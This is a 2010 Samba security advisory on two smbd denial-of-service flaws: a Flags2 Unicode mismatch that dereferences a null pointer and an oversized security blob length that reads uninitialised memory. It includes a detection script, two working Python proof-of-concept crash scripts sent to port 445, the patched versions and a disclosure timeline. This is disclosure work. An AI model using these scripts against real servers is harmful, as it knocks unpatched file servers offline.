Samba Multiple DoS Vulnerabilities (SS-2010-005)

 

  • Title: Samba Multiple DoS Vulnerabilities
  • Version: 1.0
  • Issue type: Multiple
  • Affected vendor: Samba
  • Release date: 12/05/2010
  • Discovered by: Laurent Gaffié
  • Issue status: Patch available

Summary

Two vulnerabilities were discovered in the Samba smbd daemon which allow an attacker to trigger a null pointer dereference or an uninitialised variable read by sending a specific ‘Session Setup AndX’ query. Successful exploitation of these issues will result in a denial of service.

Description

The Server Message Block (SMB) protocol, also known as the Common Internet File System (CIFS), acts as an application-layer protocol providing shared access to files, printers and Inter-Process Communication (IPC). It is also a transport for Distributed Computing Environment / Remote Procedure Call (DCE/RPC) operations. After negotiating the SMB dialect, the client sends a ‘Session Setup AndX’ packet to set up a session before it can connect to a specific share.

To trigger the null pointer dereference, the client sends a crafted SMB ‘Negotiate Protocol’ query with the SMB header field ‘Flags2’ set to ‘0x0003’ (Unicode bit clear), followed by a ‘Session Setup AndX’ request with ‘Flags2’ set to ‘0x8003’ (Unicode bit set). This sequence results in a crash of the smbd process.

The uninitialised variable read issue can be triggered if the client sends a crafted ‘Session Setup AndX’ request with the ‘security blob length’ field set to ‘\xff\xff’ (0xffff).
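As an added defender-side example (not part of the original advisory), the Python 3 script below parses a client's SMB1 request sequence and flags both patterns described above: a Unicode ‘Session Setup AndX’ following a non-Unicode ‘Negotiate Protocol’, and a SecurityBlobLength larger than the bytes actually present in the request. The packet builder and the three sample sequences are constructed test input, not captured traffic.

```python
import struct
SMB_NEGOTIATE, SMB_SESSION_SETUP_ANDX, FLAGS2_UNICODE = 0x72, 0x73, 0x8000

def smb1(command, flags2, words, data):
    """Build a NetBIOS-framed SMB1 request (constructed test input, not captured traffic)."""
    hdr = (b"\xffSMB" + bytes([command]) + b"\x00" * 4 + b"\x18"
           + struct.pack("<H", flags2) + b"\x00" * 20)             # 32-byte SMB header
    body = bytes([len(words) // 2]) + words + struct.pack("<H", len(data)) + data
    return struct.pack(">I", len(hdr) + len(body)) + hdr + body    # 4-byte NetBIOS length prefix

def parse_smb(msg):
    """Return Command, Flags2, WordCount and everything after WordCount."""
    if len(msg) < 37 or msg[4:8] != b"\xffSMB":
        raise ValueError("not an SMB1 message")
    return {"command": msg[8], "flags2": struct.unpack_from("<H", msg, 14)[0],
            "word_count": msg[36], "body": msg[37:]}

def check_session(messages):
    """Flag the two request patterns from the advisory within one client's request sequence."""
    findings, nego_unicode = [], None
    for i, msg in enumerate(messages):
        p = parse_smb(msg)
        if p["command"] == SMB_NEGOTIATE:
            nego_unicode = bool(p["flags2"] & FLAGS2_UNICODE)
        elif p["command"] == SMB_SESSION_SETUP_ANDX:
            if nego_unicode is False and p["flags2"] & FLAGS2_UNICODE:
                findings.append((i, "unicode Session Setup after non-unicode Negotiate"))
            if p["word_count"] == 12:   # extended-security form: SecurityBlobLength is word 7
                blob_len = struct.unpack_from("<H", p["body"], 14)[0]
                available = len(p["body"]) - 24 - 2   # minus the 12 words and the ByteCount field
                if blob_len > available:
                    findings.append((i, "SecurityBlobLength %#x exceeds %d bytes present" % (blob_len, available)))
    return findings

def extended_words(blob_len):
    """12 Session Setup AndX words: AndX, offset, counts, VC, SessionKey, blob length, reserved, caps."""
    return (b"\xff\x00\x00\x00\x04\x11\x32\x00\x00\x00\x00\x00\x00\x00"
            + struct.pack("<H", blob_len) + b"\x00" * 8)

NEGOTIATE_DATA = b"\x02NT LM 0.12\x00"                               # one dialect string
BLOB = b"\x60\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"   # 14-byte SPNEGO-style stub
def flag_mismatch_sequence():   # Negotiate Flags2 0x0003, then a 13-word Session Setup with Flags2 0x8003
    return [smb1(SMB_NEGOTIATE, 0x0003, b"", NEGOTIATE_DATA),
            smb1(SMB_SESSION_SETUP_ANDX, 0x8003, b"\xff\x00" + b"\x00" * 24, b"\x00" * 8)]
def oversized_blob_sequence():  # SecurityBlobLength 0xffff while only 14 blob bytes follow
    return [smb1(SMB_NEGOTIATE, 0xc853, b"", NEGOTIATE_DATA),
            smb1(SMB_SESSION_SETUP_ANDX, 0xc807, extended_words(0xffff), BLOB)]
def benign_sequence():          # consistent flags and a blob length matching the bytes present
    return [smb1(SMB_NEGOTIATE, 0xc853, b"", NEGOTIATE_DATA),
            smb1(SMB_SESSION_SETUP_ANDX, 0xc807, extended_words(len(BLOB)), BLOB)]
```

Feeding the messages of a real capture (one client connection at a time) to check_session gives the same findings for traffic matching the two proof-of-concept sequences.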

Impact

A remote attacker can cause a denial of service of the Samba daemon.

Affected products

Samba <= 3.4.7 and Samba <= 3.5.1

Proof of concept

To trigger the null pointer dereference issue (Negotiate Protocol with ‘Flags2’ 0x0003 followed by Session Setup AndX with ‘Flags2’ 0x8003), the following Python proof of concept is available:

import sys
from socket import *

# Python 2 syntax: the packet literals below are plain byte strings
if len(sys.argv) <= 1:
    sys.exit('Usage: python smbd.py 10.0.0.12')

host = sys.argv[1], 445   # target host, SMB over TCP port 445

packetnego=(
"\x00\x00\x00\xaa"
"\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x18\x03\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfe\xca\x00\x00\x00\x00"
"\x00\x87\x00\x02\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50"
"\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00\x02\x1a\x45\x4e\x49"
"\x58\x20\x43\x4f\x52\x45\x00\x02\x4d\x49\x43\x52\x4f\x53\x4f\x46"
"\x54\x20\x4e\x45\x54\x57\x4f\x52\x4b\x53\x20\x31\x2e\x30\x33\x00"
"\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00\x02\x57\x69\x6e\x64"
"\x6f\x77\x73\x20\x66\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72\x6f\x75"
"\x70\x73\x20\x33\x2e\x31\x61\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30"
"\x30\x32\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e"
"\x54\x20\x4c\x4d\x20\x76\x2e\x31\x32\x00"
)

payload=(
"\x00\x00\x01\xa3"
"\xff\x53\x4d\x42\x73\x00\x00\x00\x00\x18\x03\x80\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x41\x00\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfe\xca\x00\x00\x00"
"\x00\x0d\x75\x00\xd6\x00\x04\x11\x0a\x00\x00\x00\x00\x00\x00\x00"
"\x18\x00\x18\x00\x00\x00\x00\x00\xd4\x00\x00\x00\x99\x00\x36\xed"
"\x7f\xf4\x6b\xeb\x15\x65\x2e\xb5\xc9\x70\xbe\x39\xfa\x89\x56\x5b"
"\xb0\xc2\x56\x40\x11\x6c\xe6\x33\x1e\x93\x02\xd3\xd3\x2e\x17\xad"
"\x1f\x37\x23\xcf\x7e\x4c\xd7\x64\xbe\xd5\xdc\x1f\x23\xe0\x69\x41"
"\x00\x64\x00\x6d\x00\x69\x00\x6e\x00\x69\x00\x73\x00\x74\x00\x72"
"\x00\x61\x00\x74\x00\x65\x00\x75\x00\x72\x00\x00\x00\x4e\x00\x54"
"\x00\x34\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77"
"\x00\x73\x00\x20\x00\x4e\x00\x54\x00\x20\x00\x31\x00\x33\x00\x38"
"\x00\x31\x00\x00\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f"
"\x00\x77\x00\x73\x00\x20\x00\x4e\x00\x54\x00\x20\x00\x34\x00\x2e"
"\x00\x30\x00\x00\x00\x00\x00\x04\xff\x00\x00\x00\x00\x00\x01\x00"
"\x31\x00\x00\x5c\x00\x5c\x00\x31\x00\x39\x00\x32\x00\x2e\x00\x31"
"\x00\x36\x00\x38\x00\x2e\x00\x30\x00\x2e\x00\x31\x00\x30\x00\x34"
"\x00\x5c\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00\x3f\x3f\x3f"
"\x3f\x3f\x00"
)

s = socket(AF_INET, SOCK_STREAM)
s.connect(host)
s.send(packetnego)   # Negotiate Protocol request, Flags2 = 0x0003 (no Unicode)
s.send(payload)      # Session Setup AndX request, Flags2 = 0x8003 (Unicode)


To trigger the uninitialised variable read issue (Session Setup AndX with the security blob length set to \xff\xff), this Python proof of concept is available:

import sys
from socket import *

# Python 2 syntax: the packet literals below are plain byte strings
if len(sys.argv) <= 1:
    sys.exit('Usage: python smbd.py 10.0.0.12')

host = sys.argv[1], 445   # target host, SMB over TCP port 445

packetnego=(
"\x00\x00\x00\x85"
"\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x18\x53\xc8\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00\x00\x00"
"\x00\x62\x00\x02\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50"
"\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00\x02\x4c\x41\x4e\x4d"
"\x41\x4e\x31\x2e\x30\x00\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66"
"\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e"
"\x31\x61\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c\x4d\x20"
"\x30\x2e\x31\x32\x00"
)

payload=(
"\x00\x00\x00\xec"
"\xff\x53\x4d\x42\x73\x00\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00\x40\x00"
"\x0c\xff\x00\xec\x00\x04\x11\x32\x00\x00\x00\x00\x00\x00\x00"
"\xff\xff"  ## Security blob set to \xff\xff here
"\x00\x00\x00\x00\xd4\x00\x00\xa0\xb1\x00\x60\x48\x06\x06\x2b"
"\x06\x01\x05\x05\x02\xa0\x3e\x30\x3c\xa0\x0e\x30\x0c\x06\x0a\x2b"
"\x06\x01\x04\x01\x82\x37\x02\x02\x0a\xa2\x2a\x04\x28\x4e\x54\x4c"
"\x4d\x53\x53\x50\x00\x01\x00\x00\x00\x07\x82\x08\xa2\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x01\x28"
"\x0a\x00\x00\x00\x0f\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00"
"\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00"
"\x53\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63\x00\x65\x00\x20\x00"
"\x50\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x33\x00\x20\x00\x32\x00"
"\x36\x00\x30\x00\x30\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00"
"\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00"
"\x20\x00\x35\x00\x2e\x00\x31\x00\x00\x00\x00\x00"
)

s = socket(AF_INET, SOCK_STREAM)
s.connect(host)
s.send(packetnego)   # Negotiate Protocol request
s.send(payload)      # Session Setup AndX request with security blob length 0xffff


Solution

Update to version 3.5.2 or 3.4.8 (http://samba.org/).

Response timeline

  • 09/03/2010 – Null pointer dereference issue reported to vendor.
  • 09/03/2010 – Vendor acknowledges receipt of the advisory 2 hours after receiving the initial email.
  • 09/03/2010 – Vendor confirms the issue and provides a patch 3 hours after receiving the initial email.
  • 09/03/2010 – stratsec confirms the patch resolves the issue.
  • 15/03/2010 – Uninitialised variable read issue reported to vendor.
  • 15/03/2010 – Vendor confirms the issue and provides a patch 5 hours after receiving the initial email.
  • 15/03/2010 – stratsec confirms the patch resolves the issue.
  • 07/04/2010 – Version 3.5.2 released by the vendor, fixing both issues.
  • 11/05/2010 – Version 3.4.8 released by the vendor, fixing both issues.
  • 12/05/2010 – This advisory published.

References
 

Download advisory: SS-2010-005 stratsec Samba Multiple Vulnerabilities Security Advisory v1.0.pdf

stratsec would like to thank the Samba Security Team for their responsiveness while handling these issues.